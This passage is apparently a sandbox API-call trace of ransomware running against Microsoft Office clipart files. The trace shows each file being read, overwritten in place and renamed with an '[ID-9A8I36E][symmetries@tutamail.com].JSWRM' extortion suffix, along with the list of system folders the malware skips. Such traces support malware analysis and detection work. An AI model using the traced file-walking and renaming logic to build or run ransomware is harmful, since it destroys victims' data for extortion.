dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0078.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.685] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4660) returned 1 [0078.685] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1230) returned 0x205850 [0078.685] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1230, lpOverlapped=0x0) returned 1 [0078.692] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.693] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1230, lpOverlapped=0x0) returned 1 [0078.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0078.693] CloseHandle (hObject=0x314) returned 1 [0078.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0078.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0078.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0078.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0078.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0078.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0078.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0078.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0078.693] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0078.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0078.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0078.694] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf94, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02116_.WMF", cAlternateFileName="")) returned 1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2=".") returned 1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="..") returned 1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="...") returned 1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="windows") returned -1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="recovery") returned -1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="perflogs") returned -1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="documents and settings") returned 1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="system volume information") returned -1 [0078.694] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="msocache") returned -1 [0078.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0078.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02116_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02116_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02116_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0078.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0078.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02116_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02116_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02116_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0078.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0078.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0078.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0078.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.695] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3988) returned 1 [0078.695] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf90) returned 0x23fc98 [0078.695] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf90, lpOverlapped=0x0) returned 1 [0078.700] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.700] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf90, lpOverlapped=0x0) returned 1 [0078.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0078.700] CloseHandle (hObject=0x314) returned 1 [0078.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0078.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0078.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0078.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0078.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0078.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0078.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0078.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0078.701] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0078.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0078.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0078.701] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa4c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02141_.WMF", cAlternateFileName="")) returned 1 [0078.701] lstrcmpiW (lpString1="FD02141_.WMF", lpString2=".") returned 1 [0078.702] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="..") returned 1 [0078.702] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="...") returned 1 [0078.702] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="windows") returned -1 [0078.702] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="recovery") returned -1 [0078.702] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="perflogs") returned -1 [0078.702] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="documents and settings") returned 1 [0078.702] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.702] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="system volume information") returned -1 [0078.702] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="msocache") returned -1 [0078.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0078.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02141_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02141_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02141_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0078.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0078.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02141_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02141_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02141_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0078.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0078.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0078.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0078.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.707] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2636) returned 1 [0078.707] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa40) returned 0x20c6c0 [0078.707] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa40, lpOverlapped=0x0) returned 1 [0078.713] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.713] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa40, lpOverlapped=0x0) returned 1 [0078.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0078.713] CloseHandle (hObject=0x314) returned 1 [0078.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0078.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0078.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0078.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0078.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0078.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0078.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0078.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0078.713] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0078.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0078.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0078.714] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1510, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02153_.WMF", cAlternateFileName="")) returned 1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2=".") returned 1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="..") returned 1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="...") returned 1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="windows") returned -1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="recovery") returned -1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="perflogs") returned -1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="documents and settings") returned 1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="system volume information") returned -1 [0078.714] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="msocache") returned -1 [0078.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0078.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02153_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02153_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02153_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0078.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0078.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02153_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02153_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02153_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0078.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0078.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0078.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0078.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.715] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5392) returned 1 [0078.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1510) returned 0x205850 [0078.715] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1510, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1510, lpOverlapped=0x0) returned 1 [0078.718] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.718] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1510, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1510, lpOverlapped=0x0) returned 1 [0078.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0078.719] CloseHandle (hObject=0x314) returned 1 [0078.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0078.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: 